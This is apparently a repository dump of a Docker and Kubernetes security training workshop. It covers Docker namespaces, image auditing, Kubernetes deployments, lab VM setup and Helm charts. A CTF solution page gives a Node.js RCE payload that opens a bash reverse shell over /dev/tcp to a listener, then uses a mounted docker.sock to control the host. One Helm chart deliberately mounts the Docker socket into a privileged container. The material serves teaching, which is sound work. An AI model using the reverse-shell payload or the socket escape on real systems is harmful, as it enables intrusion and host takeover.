Docker Hub? 47 | 48 | * Docker Hub is the public registry that contains a large number of images available for your use 49 | 50 | ![Docker Hub](images/docker-hub.png) 51 | 52 | 53 | ### Docker Search 54 | 55 | * You can also search through all publicly available images in docker hub 56 | 57 | ```bash 58 | docker search wpscan 59 | ``` 60 | 61 | ![docker search command](images/docker-search-wpscan.png) -------------------------------------------------------------------------------- /gitbook/kubernetes-101/readme.md: -------------------------------------------------------------------------------- 1 | # Getting started with Kubernetes 2 | 3 | We will get started by following the `Kubernetes Basics` from the official documentation which is hosted at [Kubernetes.io](https://kubernetes.io) 4 | 5 | This tutorial provides a walkthrough of the basics of the Kubernetes cluster orchestration system. 6 | 7 | > This is an important module to understand and cover because Kubernetes has many technical terms and commands that may be new to the participants. 8 | 9 | Each module contains some background information on major Kubernetes features and concepts and includes an **interactive online tutorial**. This is great for practicing the basics. Did we mention that this is available to all without any charges so you can practice it whenever you feel like it? 10 | 11 | These interactive tutorials let you manage a simple cluster and its containerized applications for yourself. 12 | 13 | ## Creating a Cluster 14 | 15 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/create-cluster/cluster-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/create-cluster/cluster-interactive/) 16 | 17 | ## Deploying an App 18 | 19 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/deploy-app/deploy-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/deploy-app/deploy-interactive/) 20 | 21 | ## Exploring Your App 22 | 23 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/explore/explore-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/explore/explore-interactive/) 24 | 25 | ## Exposing Your App 26 | 27 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/expose/expose-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/expose/expose-interactive/) 28 | 29 | ## Scaling Your App 30 | 31 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/scale/scale-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/scale/scale-interactive/) 32 | 33 | ## Updating Your App 34 | 35 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/update/update-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/update/update-interactive/) 36 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "mailbox-service.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | # Custom Stuff 27 | volumeMounts: 28 | - name: privateregistry 29 | mountPath: "/root/.docker" 30 | readOnly: true 31 | # End Custom Stuff 32 | ports: 33 | - name: http 34 | containerPort: 80 35 | protocol: TCP 36 | livenessProbe: 37 | httpGet: 38 | path: / 39 | port: http 40 | readinessProbe: 41 | httpGet: 42 | path: / 43 | port: http 44 | resources: 45 | {{- toYaml .Values.resources | nindent 12 }} 46 | {{- with .Values.nodeSelector }} 47 | nodeSelector: 48 | {{- toYaml . | nindent 8 }} 49 | {{- end }} 50 | {{- with .Values.affinity }} 51 | affinity: 52 | {{- toYaml . | nindent 8 }} 53 | {{- end }} 54 | {{- with .Values.tolerations }} 55 | tolerations: 56 | {{- toYaml . | nindent 8 }} 57 | {{- end }} 58 | # Custom Stuff 59 | volumes: 60 | - name: privateregistry 61 | secret: 62 | secretName: privateregistrycreds 63 | -------------------------------------------------------------------------------- /gitbook/about-us/about-appsecco.md: -------------------------------------------------------------------------------- 1 | # About Appsecco 2 | 3 | [![About Appsecco](images/about-appsecco.png)](https://appsecco.com) 4 | 5 | Appsecco is a specialist application security company, founded in 2015, with physical presence in London, Bangalore, Doha and Boston, providing industry leading security advice that is firmly grounded in commercial reality. 6 | 7 | Our services cover the entire software development lifecycle from advising on how build and foster a culture of security within development teams and organisations to reviewing and advising on the security of applications and associated infrastructure under development to providing rapid response and advice in the event of a security breach or incident. 8 | 9 | As a team, we are highly qualified and have many years of extensive experience working with clients across multiple counties and in a wide range of industries and sectors; from financial services to software development, manufacturing to governmental organisations and consumer brands to ecommerce. 10 | 11 | The solutions, advice and insight we deliver to our clients always follows three core principles: 12 | 13 | 1. It must be pragmatic; taking into account the specific commercial, organisational and operational realities of each client individually 14 | 2. It must genuinely add value; the advice or solutions we provide must addresses the specific problem a client seeks to solve and have actionable insight to enable them to achieve this 15 | 3. Never be purely automated; whenever we are testing for security our reports and output always have significant, expert, human input to give the greatest possible value for our clients 16 | 17 | In addition to their client-facing work our technical team are actively involved in researching and developing new and better ways to stay secure and can regularly be found presenting their findings at industry conferences and events ranging from nullcon in India, DevSecCon in London and Singapore, to DEF CON, the world’s largest security conference held annually in the USA. 18 | 19 | Structurally we are a UK Limited company with a wholly owned Indian subsidiary (where the majority of our technical resource is based) and raised seed funding for our continuing growth in the UK in late 2016. -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/namespaces.md: -------------------------------------------------------------------------------- 1 | # Namespaces 2 | 3 | Docker uses namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container. 4 | 5 | * The `pid` namespace: Process isolation (PID: Process ID) 6 | * The `net` namespace: Managing network interfaces (NET: Networking) 7 | * The `ipc` namespace: Managing access to IPC resources (IPC: InterProcess Communication) 8 | * The `mnt` namespace: Managing filesystem mount points (MNT: Mount) 9 | * The `uts` namespace: Different host and domain names (UTS: Unix Timesharing System) 10 | * The `user` namespace: Isolate security-related identifiers (USER: userid, groupid) 11 | 12 | ## Namespaces Demonstration 13 | 14 | ``` 15 | docker run --rm -d alpine sleep 1111 16 | 17 | ps auxx | grep 'sleep 1111' 18 | 19 | sudo ls /proc/[pid]/ns/ 20 | ``` 21 | 22 | ![docker container namespaces](images/docker-container-namespaces.png) 23 | 24 | ### PID namespace 25 | 26 | * PID namespaces isolate the process ID number space, meaning that processes in different PID namespaces can have the same PID 27 | 28 | * PID namespaces allow containers to provide functionality such as suspending/resuming the set of processes in the container and migrating the container to a new host while the processes inside the container maintain the same PIDs 29 | 30 | > For example, while running nginx docker container we always get PID 1 for nginx but at the host we see a different PID like `9989` 31 | 32 | ```bash 33 | docker run --rm --name=samplewebapp1 -d nginx:alpine 34 | ps auxxx | grep nginx 35 | 36 | docker exec -it samplewebapp1 sh 37 | ps auxxx | grep nginx 38 | ``` 39 | 40 | ![docker nginx 1](images/docker-nginx-1.png) 41 | 42 | ```bash 43 | docker run --rm --name=samplewebapp2 -d nginx:alpine 44 | ps auxxx | grep nginx 45 | 46 | docker exec -it samplewebapp2 sh 47 | ps auxxx | grep nginx 48 | ``` 49 | 50 | ![docker nginx 2](images/docker-nginx-2.png) 51 | 52 | * Here we can see that both process have different pids in host system but inside containier they both use pid 1 53 | 54 | 55 | ### Attaching host processes to container 56 | 57 | * We can also pass or attach the host process namespace or any other container process namespace to container using the --pid flag 58 | 59 | ```bash 60 | docker run --rm -it --pid=host jess/htop 61 | ``` 62 | 63 | ![docker pid host](images/docker-pid-host.png) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "connectivity-check.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | # Custom Stuff for Volume Mount of Docker Socket 27 | volumeMounts: 28 | - mountPath: /custom/docker/docker.sock 29 | name: docker-sock-volume 30 | securityContext: 31 | privileged: true 32 | # End Custom Stuff 33 | ports: 34 | - name: http 35 | containerPort: 80 36 | protocol: TCP 37 | livenessProbe: 38 | tcpSocket: 39 | port: http 40 | initialDelaySeconds: 15 41 | periodSeconds: 20 42 | readinessProbe: 43 | tcpSocket: 44 | port: http 45 | initialDelaySeconds: 5 46 | periodSeconds: 10 47 | resources: 48 | {{- toYaml .Values.resources | nindent 12 }} 49 | {{- with .Values.nodeSelector }} 50 | nodeSelector: 51 | {{- toYaml . | nindent 8 }} 52 | {{- end }} 53 | {{- with .Values.affinity }} 54 | affinity: 55 | {{- toYaml . | nindent 8 }} 56 | {{- end }} 57 | {{- with .Values.tolerations }} 58 | tolerations: 59 | {{- toYaml . | nindent 8 }} 60 | {{- end }} 61 | # Custom Stuff 62 | volumes: 63 | - name: docker-sock-volume 64 | hostPath: 65 | path: /var/run/docker.sock 66 | type: File 67 | # End Custom 68 | -------------------------------------------------------------------------------- /gitbook/deploy-app/using-yaml.md: -------------------------------------------------------------------------------- 1 | # Deploying simple application in Kubernetes Cluster using YAML 2 | 3 | * To create a basic nginx deployment with 2 replicas, save this file as `nginx-deployment.yaml` using your text editor 4 | 5 | ```yaml 6 | apiVersion: apps/v1 7 | kind: Deployment 8 | metadata: 9 | name: nginx-deployment 10 | spec: 11 | selector: 12 | matchLabels: 13 | app: nginx 14 | replicas: 2 15 | template: 16 | metadata: 17 | labels: 18 | app: nginx 19 | spec: 20 | containers: 21 | - name: nginx 22 | image: nginx:1.7.9 23 | ports: 24 | - containerPort: 80 25 | ``` 26 | 27 | * Run the apply command to perform the changes in cluster 28 | 29 | ```bash 30 | kubectl apply -f nginx-deployment.yaml 31 | ``` 32 | 33 | * Get the pods related to this deployment 34 | 35 | ```bash 36 | kubectl get pods --selector app=nginx 37 | ``` 38 | 39 | ![](images/deploy-app-get-pods.png) 40 | 41 | * Update the deployment file with `replicas` to 3 in `nginx-deployment.yaml` using your text editor 42 | 43 | ```yaml 44 | ... 45 | replicas: 3 46 | ... 47 | ``` 48 | 49 | * Apply the changes 50 | 51 | ```bash 52 | kubectl apply -f nginx-deployment.yaml 53 | kubectl get pods --selector app=nginx 54 | ``` 55 | ![](images/update-deployment.png) 56 | 57 | * Expose a service within the cluster 58 | * Create a file `nginx-service.yml` with the following content 59 | 60 | ``` 61 | apiVersion: v1 62 | kind: Service 63 | metadata: 64 | name: nginx-deployment 65 | spec: 66 | ports: 67 | - port: 80 68 | protocol: TCP 69 | targetPort: 80 70 | selector: 71 | app: nginx 72 | type: ClusterIP 73 | ``` 74 | 75 | * Create the service in the cluster 76 | 77 | ``` 78 | kubectl apply -f nginx-service.yml 79 | ``` 80 | 81 | * Start a `port-foward` to access in-cluster service 82 | 83 | ``` 84 | kubectl port-forward svc/nginx-deployment 8888:80 85 | ``` 86 | 87 | * From another terminal, access the service through the port forward 88 | 89 | ``` 90 | curl http://localhost:8888/ 91 | ``` 92 | 93 | * Delete the deployment 94 | 95 | ```bash 96 | kubectl delete -f nginx-deployment.yaml 97 | ``` 98 | ![](images/delete-deploy.png) 99 | 100 | * Delete the service 101 | 102 | ``` 103 | kubectl delete -f nginx-service.yml 104 | ``` 105 | 106 | 107 | ### References 108 | 109 | * [https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/](https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-images-containers.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Images and Containers 2 | 3 | There are multiple checks we can perform to audit against the docker images and containers. Containers are nothing but running instances of an image. We can look at an images's configuration and options to find any issues or misconfigurations. 4 | 5 | ## Checking the checksum for the images 6 | 7 | ```bash 8 | docker images --digests ubuntu 9 | ``` 10 | 11 | ![docker images digest](images/docker-digest-images.png) 12 | 13 | ## Checking for content trust to get signatures 14 | 15 | * Content trust is disabled by default. To enable it, set the `DOCKER_CONTENT_TRUST` environment variable to 1 16 | 17 | * Checking the image issuers with `docker trust` 18 | 19 | ```bash 20 | docker trust inspect mediawiki --pretty 21 | ``` 22 | 23 | ![docker trust inspect](images/docker-trust.png) 24 | 25 | ## Looking for known vulnerabilities 26 | 27 | * Most of the containers in dockerhub use base containers. If those aren't updated frequently, then known vulnerabilities might exist in them 28 | 29 | * We can use docker hub registry scanning, clair (Vulnerability Static Analysis for Containers) to check for vulnerable packages in images 30 | 31 | * Let's now check for the known vulnerabilities for old docker images using [vulners audit](https://vulners.com/audit) 32 | 33 | ![vulners audit site](images/vulners-audit-site.png) 34 | 35 | > Vulners audit tool provides you with the ability to easily check the OS for vulnerable packages. Select your OS type, version and paste the list of installed packages to identify the vulnerable software. 36 | 37 | ```bash 38 | docker run --rm -it 71aa5f3f90dc bash 39 | 40 | cat /etc/issue 41 | 42 | dpkg-query -W -f='${Package} ${Version} ${Architecture}\n' 43 | ``` 44 | 45 | ![docker query packages](images/docker-image-packages-query.png) 46 | 47 | * Now, we will paste these packages in the vulners and see the list of known vulnerabilities 48 | 49 | ![known vulnerabilities](images/knwon-vulnerabilities.png) 50 | 51 | ### Vulnerability Scan using Trivy 52 | 53 | > [Trivy](https://github.com/aquasecurity/trivy) can also be used for running vulnerability scan on docker images. 54 | 55 | ``` 56 | docker run --rm \ 57 | -v ~/.cache:/root/.cache/ \ 58 | -v /var/run/docker.sock:/var/run/docker.sock \ 59 | aquasec/trivy ubuntu 60 | ``` 61 | 62 | 63 | ## Checking for metadata, secrets and environment variables 64 | 65 | * We can check for these data using the `docker inspect` command on both images and containers 66 | 67 | ```bash 68 | docker inspect 69 | docker inspect 70 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking insecure volume mounts - Solution 2 | 3 | * The application is running at CTF VM. You can access it by navigating to `http://CTFVMIP` 4 | 5 | ![node app home page](images/insecure-mount-node-app.png) 6 | 7 | * This NodeJS application is vulnerable to remote code execution (RCE) in `q` GET parameter. Access the endpoint using `http://CTFVMIP/?q="docker"` 8 | 9 | ![vulnerable parameter](images/insecure-mount-vulnerable-parameter.png) 10 | 11 | * To exploit this RCE, we will be using below payload. Here `192.168.56.3` need to replace with your student VM IP 12 | 13 | ```bash 14 | require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 15 | ``` 16 | 17 | * Start the netcat listener on `student` machine to get the reverse shell 18 | 19 | ```bash 20 | nc -lvp 5555 21 | ``` 22 | 23 | ![nc listen in student vm](images/nc-student-listen.png) 24 | 25 | * To exploit and get reverse shell use the below URL. It contains the payload to connect back to student vm. Ensure that you have replaced `192.168.56.3` with your student VM IP 26 | 27 | ```bash 28 | http://CTFVMIP?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 29 | ``` 30 | 31 | ![reverse shell exploit](images/insecure-mount-exploit.png) 32 | 33 | * Now we will receive the reverse shell in our student vm where we listening via `nc` 34 | 35 | ![reverse shell in nc](images/insecure-mont-reverse-shell.png) 36 | 37 | * Now, we have shell inside the docker container, we can explore the container for post exploitation 38 | 39 | * We can see that `ls -l /var/run/docker.sock` is available and mounted from the host system. 40 | 41 | ![docker socket](images/insecure-mount-docker-socket.png) 42 | 43 | > **This allows attacker to access the host docker service using host option with docker client by using the UNIX socket** 44 | 45 | * The docker client is already downloaded into the container and is at `/root/docker` 46 | 47 | ```bash 48 | cd /root/docker/ 49 | ls -l 50 | ``` 51 | 52 | ![docker client files](images/docker-client-file.png) 53 | 54 | * To access the host resource using the `docker.sock` UNIX socket. Run the following 55 | 56 | ```bash 57 | ./docker -H unix:///var/run/docker.sock ps 58 | ./docker -H unix:///var/run/docker.sock images 59 | ``` 60 | 61 | ![accessing host system using docker socket](images/accessing-host-system-using-socket.png) 62 | 63 | * Now, we have full privilege over the host system :) 64 | 65 | 66 | ## Fixing this vulnerability 67 | 68 | * Running the containers with limited user privileges and using rootless containers 69 | * Also using isolated instances for the required privileges 70 | -------------------------------------------------------------------------------- /gitbook/environment-setup/importing-virtualmachines.md: -------------------------------------------------------------------------------- 1 | # Importing virtual machines 2 | 3 | The students need to import two virtual machines for docker labs 4 | 5 | 1. `docker-student.ova` 6 | 2. `docker-ctf.ova` 7 | 8 | 9 | ## Download VM 10 | 11 | | VM Name | Source URL | 12 | |---------|------------| 13 | | docker-student.ova | http://www.mediafire.com/file/72xe4d4vv10fgxz/docker-student.ova/file | 14 | | docker-ctf.ova | http://www.mediafire.com/file/39e1w5wt7tmxr43/docker-ctf.ova/file | 15 | 16 | The `checksums` are available at `http://www.mediafire.com/file/6xp3c7voy60zn1e/checksum.txt/file` 17 | 18 | ## Student Machine (docker-student.ova) 19 | 20 | * Open VirtualBox, and select `File` -> `Import Appliance` from the top menu 21 | 22 | ![Importing student ova](images/import-ova.png) 23 | 24 | * Select `docker-student.ova` file from the `workshop-content` folder 25 | 26 | ![selecting student ova](images/select-student-ova.png) 27 | 28 | * Check the "Reintialize the MAC address of all network cards" checkbox, and click on Next to import the ova file 29 | 30 | ![student ova settings](images/student-ova-settings.png) 31 | 32 | * Now we can see that ova file is importing 33 | 34 | ![processing](images/processing.png) 35 | 36 | * Use following credentials for `student` VM login 37 | 38 | ```bash 39 | username: student 40 | password: Docker@321 41 | ``` 42 | 43 | ![student vm login](images/student-vm-login.png) 44 | 45 | * Your IP address may differ from what is visible in the screenshot. Please note down this IP address for later use 46 | 47 | ## CTF Machine (docker-ctf.ova) 48 | 49 | 50 | * Open VirtualBox, and select `File` -> `Import Appliance` from the top menu 51 | 52 | ![Importing ctf ova](images/import-ova.png) 53 | 54 | * Select `docker-ctf.ova` file from the `workshop-content` folder 55 | 56 | ![selecting ctf ova](images/select-ctf-ova.png) 57 | 58 | * Check the "Reintialize the MAC address of all network cards" checkbox, and click on Next to import the ova file 59 | 60 | ![ctf ova settings](images/ctf-ova-settings.png) 61 | 62 | * Use following credentials for `ctf` VM login 63 | 64 | ```bash 65 | username: ctf 66 | password: Dockerctf@321 67 | ``` 68 | 69 | ![ctf vm login](images/ctf-vm-login.png) 70 | 71 | * Your IP address may differ from what is visible in the screenshot. Please note down this IP address for later use 72 | 73 | ## Test Setup 74 | 75 | ### Ensure Networking within VM 76 | 77 | > Ensure you are able to `ping` one VM from the other. 78 | 79 | ![VM Networking](images/vm-networking.png) 80 | 81 | ### Ensure SSH Access from Host 82 | 83 | > Ensure you are able to SSH into both `Student` and `CTF` VM from your host using an SSH client. 84 | 85 | ![VM Host SSH](images/vm-host-ssh.png) --------------------------------------------------------------------------------